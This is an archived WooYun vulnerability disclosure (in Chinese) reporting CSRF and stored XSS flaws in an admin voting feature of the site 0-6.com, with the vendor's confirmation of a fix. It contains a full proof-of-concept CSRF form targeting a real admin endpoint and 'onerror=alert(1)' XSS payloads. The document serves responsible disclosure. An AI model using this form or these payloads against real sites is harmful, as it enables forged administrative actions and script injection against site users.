当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0108174

漏洞标题:妈妈网某处一枚CSRF

相关厂商:0-6.com

漏洞作者: 第四维度

提交时间:2015-04-16 10:06

修复时间:2015-06-02 15:38

公开时间:2015-06-02 15:38

漏洞类型:CSRF

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-16: 细节已通知厂商并且等待厂商处理中
2015-04-18: 厂商已经确认,细节仅向厂商公开
2015-04-28: 细节向核心白帽子及相关领域专家公开
2015-05-08: 细节向普通白帽子公开
2015-05-18: 细节向实习白帽子公开
2015-06-02: 细节向公众公开

简要描述:

附加一枚XSS

详细说明:

第一枚:CSRF

csrf1.png


测试位置处,发起一个新的测试

csrf2.png


可以看到提交的表单,有csrf。
我们构造表单本地提交看看。

<form method="POST" name="form0" action="http://my.0-6.com:80/admin/App/Vote/save.do">
<input type="hidden" name="AppVoteInfo.Id" value=""/>
<input type="hidden" name="AppVoteInfo.OptionCount" value=""/>
<input type="hidden" name="AppVoteInfo.Name" value="csrftest"/>
<input type="hidden" name="AppVoteInfo.Note" value=""/>
<input type="hidden" name="VoteOptionId" value="0"/>
<input type="hidden" name="VoteOptionTitle" value=" <img src"/>
<input type="hidden" name="VoteOptionId" value="0"/>
<input type="hidden" name="VoteOptionTitle" value=" <img src"/>
<input type="hidden" name="VoteOptionId" value="0"/>
<input type="hidden" name="VoteOptionTitle" value="
<img src="x"onerror="alert(1)">"/>
<input type="hidden" name="VoteOptionId" value="0"/>
<input type="hidden" name="VoteOptionTitle" value="
<img src="x"onerror="alert(1)">"/>
<input type="hidden" name="VoteOptionId" value="0"/>
<input type="hidden" name="VoteOptionTitle" value="
<img src="x"onerror="alert(1)">"/>
<input type="hidden" name="VoteOptionId" value="0"/>
<input type="hidden" name="VoteOptionTitle" value=""/>
<input type="hidden" name="VoteOptionId" value="0"/>
<input type="hidden" name="VoteOptionTitle" value=""/>
<input type="hidden" name="VoteOptionId" value="0"/>
<input type="hidden" name="VoteOptionTitle" value=""/>
<input type="hidden" name="VoteOptionId" value="0"/>
<input type="hidden" name="VoteOptionTitle" value=""/>
<input type="hidden" name="VoteOptionId" value="0"/>
<input type="hidden" name="VoteOptionTitle" value=""/>
<input type="hidden" name="VoteOptionId" value=""/>
<input type="hidden" name="VoteOptionTitle" value=""/>
<input type="hidden" name="VoteOptionId" value=""/>
<input type="hidden" name="VoteOptionTitle" value=""/>
<input type="hidden" name="VoteOptionId" value=""/>
<input type="hidden" name="VoteOptionTitle" value=""/>
<input type="hidden" name="VoteOptionId" value=""/>
<input type="hidden" name="VoteOptionTitle" value=""/>
<input type="hidden" name="VoteOptionId" value=""/>
<input type="hidden" name="VoteOptionTitle" value=""/>
<input type="hidden" name="VoteOptionId" value=""/>
<input type="hidden" name="VoteOptionTitle" value=""/>
<input type="hidden" name="VoteOptionId" value=""/>
<input type="hidden" name="VoteOptionTitle" value=""/>
<input type="hidden" name="VoteOptionId" value=""/>
<input type="hidden" name="VoteOptionTitle" value=""/>
<input type="hidden" name="VoteOptionId" value=""/>
<input type="hidden" name="VoteOptionTitle" value=""/>
<input type="hidden" name="VoteOptionId" value=""/>
<input type="hidden" name="VoteOptionTitle" value=""/>
<input type="hidden" name="AppVoteInfo.MutSelect" value="0"/>
<input type="hidden" name="AppVoteInfo.VoteLevel" value="0"/>
<input type="hidden" name="LimitYear" value="2015"/>
<input type="hidden" name="LimitMonth" value="4"/>
<input type="hidden" name="LimitDay" value="22"/>
<input type="hidden" name="LimitHour" value="17"/>
<input type="hidden" name="AppVoteInfo.HomePageShow" value="1"/>
<input type="hidden" name="Invite" value="1"/>
</form>


csrf4.png


投票成功
我们查看一下

csrf5.png


投票位置同样存在。
第二枚:XSS
刚刚单独提交了一枚投票处的XSS,测试位置同样存在一枚。

测试xss.png


漏洞证明:

http://12293623.0-6.com/


使用IE访问可以触发跨站。

修复方案:

#csrf
1、token
2、判断来源
#XSS
1、html转义

版权声明:转载请注明来源 第四维度@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-04-18 15:36

厂商回复:

已经修复

最新状态:

暂无